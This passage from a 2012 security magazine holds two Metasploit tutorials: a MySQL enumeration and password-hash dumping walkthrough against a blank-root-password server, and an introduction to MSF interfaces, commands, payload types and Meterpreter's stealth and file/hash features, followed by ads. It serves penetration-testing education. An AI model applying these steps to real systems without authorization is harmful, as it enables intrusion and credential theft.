After running the module, you should see output like in the following Figure 35. Before connecting to the MySQL server directly using the login information, we can use two other MSF modules to enumerate the database and dump credential information. The two modules that we will be using are mysql_enum and mysql_hashdump. This, can be done manually, but well, I think knowing that a automation module for this process exists, we would tend to do it the easy way round. Mysql_enum is used to find information about the various database accounts on the remote MySQL server. But we will need to configure three variables

Figure 38. Configuring and running the mysql_hashdump module

Figure 39. Connecting to the target MySQL Server using the discovered credentials

24

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

to do so RHOST, USERNAME and PASSWORD. But since the password to the root account is blank, we do not need to set the PASSWORD variable. After configuring the module, you can run it with the run command (Figure 36). Sample output of the following command is: Figure 37 Now, it is time to configure the mysql_hashdump module to dump the password hashes belonging to the various database user accounts. Again, the same variables need to be set as the previous module. After configuring the module, you can run it using the run command, as follows: Figure 38. After this process is complete, we can make a direct connection to the target MySQL server using a mysql client. Since the attacker box is running BackTrack 5, the mysql client is pre-installed. You can run it with the following syntax mysql -h <IP> -u <username> -p <password>. Replace the required parts of the command and run it. This is how it looks after the connection is established (Figure 39). Now that the mysql connection has been established, you can run various commands to hit the jackpot! You can use the show databases; command to display a list of databases on the server. You might get something like this: Figure 40. Now, let me assume that you might be interested in the database called mysql. You can now use

Figure 42. Data in table user

the mysql database using the command use mysql. It will show you a message which acknowledges that the database has been changed. After that, you can run the command show tables; to list the tables on the current database (in this case mysql) (Figure 41). Now, the most interesting table here is the one called user. If user has two columns called username and password, then you can extract the data from the table user using the command select username, password from user; On running that command, you should see something similar to the output shown in the Figure 42. We can now see that there are three users with no password. You may now decide that you want to

Figure 41. Tables in the database named mysql

THe eXPLOIT MAGAZINe AUGUST 2012

25

MeTASPLOIT

see the tables in the database owasp10. You can do that by running the command show tables from owasp10;. Now, youll see the tables present in the owasp10 database. You might see something like this: Figure 43. You can go on like this till you find the information that you are hired to find. Remember, these tables were created well in advance for the sake of demonstration of various commands for this tutorial. You will not find all of these tables in your installation unless you create them before you launch this attack. The methods described here, are solely for teaching you the various techniques that may be used for exploiting machines using MSF. It is to show how useful MSF is, in real-world scenarios. In the beginning of this issue, I have pointed out that MSF makes it very easy for us to configure and deploy exploits. I have shown you how simple it is to use the msfconsole, which is the CLI for the Metasploit Framework. Configuring exploits was really easy. I suggest you all, to try as many exploitations as you can legally. Do not use these techniques to do anything illegal, that is not the purpose of these tutorials. These articles and instructions are mainly to break the ice, and introduce you to the most common and simplest of exploitation frameworks out there. I would like you all to try your attacks either on war-gaming server, or better, on your virtual machines, using the Metasploitable VMWare Image. You can find out more by following this link http:// www.offensive-security.com/metasploit-unleashed/ Metasploitable. I have only demonstrated a few of the existing MSF scripts which may be used in various attacks. They are extremely helpful (but sometimes fail, as we have seen, when we tried to kill our AV). I suggest reading about the rest of the MSF scripts from here http://www.offensive-security.com/ metasploit-unleashed/Existing_Scripts.

The best place to learn more about the Metasploit Framework, is the official website of Metasploit. It goes through everything from the basics to the more advanced techniques. I would like all of you to read up from here http://www.offensive-security. com/metasploit-unleashed/Main_Page. There are many parts of the Metasploit Framework that are not really in the scope of this issue, I may cover it in future issues if the editorial board of Hakin9 permit. Armitage, SET (Social Engineering Tookit) and Fast-Track are some important things you can read about. If you need a complete MSF Module reference, you can find one online, on the official OffensiveSecurity website http://www.offensive-security. com/metasploit-unleashed/Module_Reference . Why read from some other source, when the creators themselves put it up, in a neat way. This link is definitely a must-read for everybody. A lot of Exploits may not be directly included into Metasploit. MSF offers the flexibility of writing your own exploits and modules and including them into the Framework. But another place, where there are up-to-date public exploits, as a search-able database is http://www.exploit-db.com/. You can also go through some of the papers there, a lot of very well written stuff. After going through this issue, you might just feel like writing exploits yourself. There are very few places on the internet that actually offer tutorials for this. The best place that gives you an idea on exploit-writing, from the very basic stack based overflows, to the more advanced exploits is http:// corelan.be/. Well, I think Ive covered most of what I wanted to. Id like to thank the Hakin9 team for giving me this opportunity to write for this issue. Im very glad and extremely grateful. I hope they give me such opportunities in the future as well. Cheers!

Figure 43. Tables in the database called owasp10

www.abhinavdas.in @theabhinavdas

Abhinav Das

26

THe eXPLOIT MAGAZINe AUGUST 2012

If our FREE antivirus for home outperforms competitors' end-point products, imagine what our business solutions can do for you.

e most popular antivirus in the world. www.avast.com/best-antivirus

MeTASPLOIT

Metasploit: Part-I
by Sudhanshu Chauhan

When it comes to penetration testing and a single tool is required to own all the boxes, Metasploit Framework is the one stop shop. Metasploit Framework or better known as MSF is an advanced open-source tool written in ruby which provides security researchers and pentesters a framework to develop and launch exploits, payloads, encoders, exploration and other different security testing tools.

SF initially started as a collection of exploits, but as the technology advanced it began to grow in size as well as functionality. Currently it provides capabilities for the design and development of reconnaissance,

exploitation and post-exploitation security tools. It ranks second on SecTools.Org: Top 125 Network Security Tools (Source: Sectools.org). Metasploit was basically developed by HD Moore in 2003 as a network tool. Initially it was created

Figure 1. Metasploit Console

28

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

using scripting language Perl but later on, it was completely rewritten in the Ruby programming language. Today it is one of the largest Ruby project with more the 700,000 lines of code. Metasploit project had been acquired by Rapid7, a company that provides security risk intelligence solutions on October 21, 2009. Figure 1 shows a screenshot of the Metasploit console. Some of the terms used above (and further in the article) are clarified as below: Exploit A piece of software, a data chunk, or command sequence that takes advantage of a bug, vulnerability or bad configuration in order to cause unintended or unanticipated behavior to occur on computer software or hardware. Payload The essential data that is being carried within a packet or other transmission unit. It is basically the code that will be executed on the target system upon successful exploitation. Encoders Ways to twist the code such that anti-malware applications/IDS/IPS wont detect the payload. The basic exploitation steps using the Framework are:

Choosing and configuring anexploit; Validate whether the chosen system is susceptible to the chosen exploit (optional); Choosing and configuring apayload; Choosing the encoding technique to encode the payload; Executing the exploit. Figure 2 displays the exploitation process through an example of successful Windows 7 machine exploitation. One of the major advantages of the MSF is the modularity of allowing combining any exploit with any payload. It assists the tasks of all the attackers, the exploit writers, and the payload writers and hence has become the tool of choice for anybody related to information security (or insecurity). To initialize the process of exploitation, some information is required about the target system (like OS/Browser version). This information can be collected via techniques like port scanning, OS fingerprinting, banner grabbing etc. Some of the best tools Based on this information the exploit and payload are chosen and the exploitation process advances. Metasploit has the ability to import vulnerability scan records and match the identified vulnerabilities to existing exploit modules for accurate exploitation and this ability is what makes MSF one of the
of trade for these implement techniques are nmap (network mapper); Nessus (Vulnerability scanners) etc.

Figure 2. Exploitation Example

THe eXPLOIT MAGAZINe AUGUST 2012

29

MeTASPLOIT

Pros and Cons: It is the most well supported way to access all (almost) the features within Metasploit. It is the most stable MSF interface. Full readline support, tabbing and command completion available. External command execution is possible. Not as point and click as msfgui/msfweb.

Msfcli

Figure 3. msfconsole

best exploitation frameworks with periodic functionality updates.

MSF Environments

Metasploit framework has four work environments, msfconsole, msfcli, msfweb and msfgui interface (newly introduced) each with their own strengths and weaknesses. All these interfaces are explained below: The msfconsole is the traditional and primary means of using the MSF. It provides a centralized console and allows efficient access to virtually all of the options available in Metasploit framework. After installation, the console can be simply launched by typing the command ./msfconsole. Figure 3 shows msfconsole interface.

The msfcli interface allows for exploits to be executed from the UNIX or Windows command line without the need to first launch the msfconsole interface. This is best suited for quickly launching an exploit by directly specifying the required parameters as command-line arguments. But it can handle only one shell at a time, which makes it quite impractical for client-side attacks. Figure 4 shows msfcli interface. Pros and Cons: Its easy to use and hence good for learning. Ideal for use in scripts and simple automation. Only one shell can be handled at a time. Not as well supported as msfconsole.

Msfconsole

Msfweb The Msfweb provides the user with a browser based interface to access and launch exploits, but is not a recommended interface as it is not very stable and not being actively developed. Its good for demonstration purpose only. Figure 5 shows msfweb. Pros and Cons:

Figure 4. msfcli

30

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

It provides a pretty to-use interface. Good for the demonstration of the exploitation to the management/layman. Not as well supported as msfconsole. Slower and less stable. Msfgui A new GUI for Metasploit has been added to the Metasploit SVN Repository in 2010, which provides

the functionality of msfconsole in addition to many new features. This new GUI is multi-platform and it is based on Java. It provides a better interface than Msfweb and is more stable. Figure 6 shows msfgui. Pros and Cons: Provides a very stable GUI. Easy to implement and use. Requires comparatively more memory.

Figure 5. msfweb

Figure 6. msfgui

THe eXPLOIT MAGAZINe AUGUST 2012

31

MeTASPLOIT

MSF Basic Commands

Before using MSF for exploit development and/or pentesting it would be useful to learn some basic commands and their functionality. Below is a set of most frequently used commands.
help:

The 'help' command does what its name suggests, it gives basic information of all the commands. search <keyword here>: Inputting the command search along with the keyword lists out the various possible exploits, payloads that have that keyword pattern in them. show exploits: The command 'show exploits' lists out the currently available exploits. show payloads: Using the same 'show' command, we can also list the payloads available. show options: Typing in the command 'show options' will show options that have been set. Each exploit and payload comes along with its own options that can be set. info <type> <name>: To search for specific information on an exploit or payload, use the 'info' command. use <exploit name>: Inserting this command tells Metasploit to use the exploit with the specified name provided. set RHOST <hostname/ip>: This command is used to instruct Metasploit to target the specified remote host.

This command sets the port that Metasploit will connect to on the remote host. set PAYLOAD <payload name>: This command sets the payload that is to be used and will provide a shell when a service has been exploited. set LPORT <local port>: This command sets the port number that the payload will open on the server machine when a service is exploited. One thing to note here is that the provided port number should not be reserved or already in use on the machine. exploit: Actually launch the exploit code on the service to be exploited. sessions l: Displays and controls sessions between the user and targeted hosts. sessions -i <ID>: Various sessions on the exploited systems can be accessed using this command, where ID is specifies the session to be interacted with. Anything that can run from the command line.

set RPORT <host port>:

Some of these commands are demonstrated in Figure 2.

MSF Exploit types

MSF Exploits can be divided into two categories namely active and passive based on the way they operate.

Figure 7. Meterpreter

32

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

Active exploit

An active exploit will execute till its completion and exploit a specific host machine and finally will exit. Brute-force modules will exit when a shell opens from the victim. In case an error is encountered the module execution will stop. An active module can be forced to the background by passing j to the exploit command.

It does not create a new process. It does work in chrootd environments. It does allow for robust extensibility. Meterpreter and all of the extensions that it loads are executed completely from memory and never touch the targets disk, thus leave no trace on the hard disk which allows them to execute under the radar of standard Anti-Virus detection/Forensic techniques. Scripts and plugins can be loaded, executed and unloaded dynamically as and when required. Figure 7 demonstrates a Meterpreter core command list. Meterpreter is designed in such a manner that it can work on various different platforms, provided that there is a means by which shared objects can be loaded from memory. This makes it possible to have a single meterpreter client that is capable of running modules which are designed and developed to compile on a variety of platforms and architectures. Meterpreter can be considered as a typical command interpreter which has a command line and a set of commands that can be executed. The functionality it provides is that the meterpreter client can control the set of commands by injecting new extensions at runtime. As the extensions can potentially be applicable across platforms and architectures, so the meterpreter client can use the same client interface (and command set) to control the extensions regardless. It communicates over the stager socket and offers a wide-ranging client-side Ruby API. Metasploit has a full-featured Ruby client API. How it works (source: http://www.offensive-security.com/metasploit-unleashed). The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc. The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL. The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client. Lastly, Meterpreter loads extensions. It will always load stdapi and will load priv if the module gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV protocol.

Passive exploit

A passive exploit holds and waits for an incoming host and exploits them as they connect. These exploits mostly focus on clients (web browsers, FTP clients, etc.), i.e. intervention from the victim users side. Passive exploits report shells as they happen and can be enumerated by passing sessions l which displays and controls sessions between the user and targeted hosts. Sessions on the exploited systems can be accessed using sessions -i command, along with the session ID.

MSF payload types

MSF provides three different payload modules: Singles, Stagers and Stages. Each payload provides different functionality and is suitable for different scenario.

Singles

They are self-contained payloads which does a specific task. E.g. windows/adduser.

Stagers

Stagers create a network connection between attacker and victim, it is required as singles cannot deliver arbitrarily large payload at one shot (depending upon exploit). E.g. windows/shell/bind_tcp (Bind TCP Stager).

Stages

Stages are payload components that are downloaded by stagers and executed. They typically do complex tasks like VNC, Meterpreter etc. E.g. windows/shell/bind_tcp (Windows Command Shell).

Meterpreter

Explanation of the Metasploit payloads cannot be complete without an explanation of Meterpreter, an advanced payload included in MSF. The way to look at the Meterpreter is not simply as a payload, but slightly as an exploit platform that is executed on the remote system. Meterpreter is short for Meta-Interpreter which is a multi-faceted, dynamically extensible payload that uses in-memory DLL injection and is runtime extensible over the network. DLL injection is a technique used to execute code inside the address spaceof a different process by forcing it to load a dynamiclink library. The striking features which make Meterpreter stand out from other payloads are as follow:

Meterpreter Design Goals

Stealthy
Stealth is one of the most important goals of a pentester during exploitation. Meterpreter provides this feature by completely residing in memory and not touching the disk, hence leaving no trace behind for forensic analysis. Meterpreter injects itself into the
33

THe eXPLOIT MAGAZINe AUGUST 2012

MeTASPLOIT

compromised process and creates no new processes. It can also migrate to other running processes easily. By default, Meterpreter uses encrypted communications which makes it even stealthier.

Powerful

Meterpreter utilizes a channelized communication system and provides some powerful features like upload/download files, retrieve passwords hash, scripts to automate common post exploitation tasks. Features can be injected on the fly and are loaded over the network. New features can be added to Meterpreter without rebuilding it. This can be done by loading extensions. The client can upload the DLL over the socket which will be loaded in-memory by the server running on the victim and initialized. The new extension will register itself with the server. The client on the attackers machine loads the local extension API and can call the extensions functions. Command Reference (source: http://dev. metasploit.com/documents/meterpreter.pdf). Some common commands provided by Meterpreter
use:

Extensible

The use command is used to load meterpreter extensions. These extensions typically provide more advanced commands and features to both the client and the server. read: This command reads data that has be outputted by the remote servers side of the channel. A maximum amount of data to read can optionally be specified as the length parameter. write: This command writes an arbitrary amount of data to the input handler on the remote servers end of the channel. This is a non-interactive method by which data can be sent to the remote servers end of the channel. Once the command is issued data can be typed on the clients side until complete. Once complete, a . should be issued on an empty line, thus symbolizing the end of the input. close: This command closes a channel and frees its resources. After a channel is closed it cannot be read from, written to, or interacted with. Most channels close automatically. interact: This command starts an interactive session with the channel specified in channel id. To terminate the interactive session a Ctrl-C must be issued. A prompt will be given asking whether or not the interactive session should really be terminated. initcrypt: This command provides the client with the ability to enable an arbitrary cipher which will as a result encrypt the Value field of all the packets sent between the client and

the server excluding those which are explicitly PLAIN. The only supported cipher at the time of this writing is XOR but the framework existing for adding custom ciphers. upload: This command allows the client to upload files the local machine to the remote server. The command allows for specifying one or more files that are local to the client machine and are to be uploaded to the directory specified in dst on the remote server. download: This command allows the client to download files from the remote server to the local clients machine. The command allows for specifying one or more files that are to be downloaded to the directory specified in dst. portfwd: This command is an advanced means by which TCP connections can be tunneled through the connection between the client and the server to hosts on the servers network. This allows the client to access hosts on the servers network which may not otherwise be directly accessible. It is also useful for chaining exploits. execute: This command is used to execute an application on the remote server, optionally channelizing the input and output. When the input and output is channelized by using the -c parameter, it is possible for the client to read, write, and interact with the executable on the server. kill: This command provide a means by which processes on the remote server can be terminated. getuid: Provides the username that is associated with the currently logged in user for the process. sysinfo: Provides information about the target host such as computers name and its OS version string.

Conclusion

This article provided a high-level introduction to Metasploit Framework and its usage. Metasploit is not just an exploitation framework but it also provides some great post-exploitation and security testing features which certainly takes pentesting to the next level. Meterpreters ability of in-memory library injection makes it the ideal vector for stealth. With meterpreters complete integration into the Metasploit Framework it can be easily used with future exploits. With very strong and constantly evolving Metasploit development it is hoped that new and existing modules will be developed and extended to make Metasploit framework a more powerful tool. Reference Website: http://www.offensive-security.com/metasploit-unleashed/.

34

THe eXPLOIT MAGAZINe AUGUST 2012

UATs coveted Bachelor of Science degree in Network Security is a vital national resource

One of the most prestigious Network Security programs in the country We will teach you the concepts of security by design, and layered security to protect against exploitation of networks and data

UAT has been designated as a Center for Academic Excellence in Information Systems Security Education by the US National Security Agency

THEY SELDOM SMILE AT THE NSA. CAN YOU MAKE THEM GRIN?

Learn how to synthesize and apply these vital skills and leadership ability to succeed in the fast moving field of Network Security.
Bachelor of Science Network Engineering Network Security Technology Forensics Master of Science Information Assurance

Program accreditations, affiliations and certifications:

SYST EMS SECURITY FOR THE 21st CENTURY

! CLUSTERGEEK WITH CAUTION

LEARN, EXPERIENCE AND INNOVATE WITH THE FOLLOWING DEGREE STUDENTS: Advancing Computer Science, Artificial Life Programming, Digital Media, Digital Video, Enterprise Software Development, Game Art and Animation, Game Design, Game Programming, Human-Computer Interaction, Open Source Technologies, Robotics and Embedded Systems, Serious Game and Simulation, Strategic Technology Development, Technology Product Design, Technology Studies, Virtual Modeling and Design, Web and Social Media Technologies
GEEK 411 AD

Prepare to Defend! www.uat.edu 877.828.4335

GEEK 411

UAT STUDENT LIFE MAGAZINE

| 1

PLEASE SEE WWW.UAT.EDU/FASTFACTS FOR THE LATEST INFORMATION ABOUT DEGREE PROGRAM PERFORMANCE, PLACEMENT AND COSTS.

Air Freshener?

The Industrys First Commercial Pentesting Drop Box.

Pwn Plug.

Printer PSU? ...nope

F E A T U R E S :

J Covert tunneling J SSH access over 3G/GSM cell networks J NAC/802.1x bypass J and more!

Discover the glory of Universal Plug & Pwn

p) 802.227.2PWN

@ pwnieexpress.com
t) @pwnieexpress e) [email protected]